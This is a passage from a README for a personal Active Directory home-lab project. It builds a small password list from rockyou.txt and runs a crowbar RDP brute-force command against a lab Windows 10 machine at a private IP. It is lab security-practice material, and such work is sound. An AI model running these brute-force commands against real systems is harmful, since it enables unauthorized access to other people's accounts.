EthanDann/Active-Directory-Project/README.md

 head -n 20 rockyou.txt > passwords.txt
 ```
 - Also added in the actual password of the user being targeted on the Windows 10 machine, for purposes of the demo
-- Then went to the Windows 10 target machine, enabled RDP and added both of the users that were created in Active Directory
 - On the kali linux terminal, started a brute force attack via 'crowbar' by typing:
 ```bash
 crowbar -b rdp -u tsmith -C passwords.txt -s 192.168.10.100/32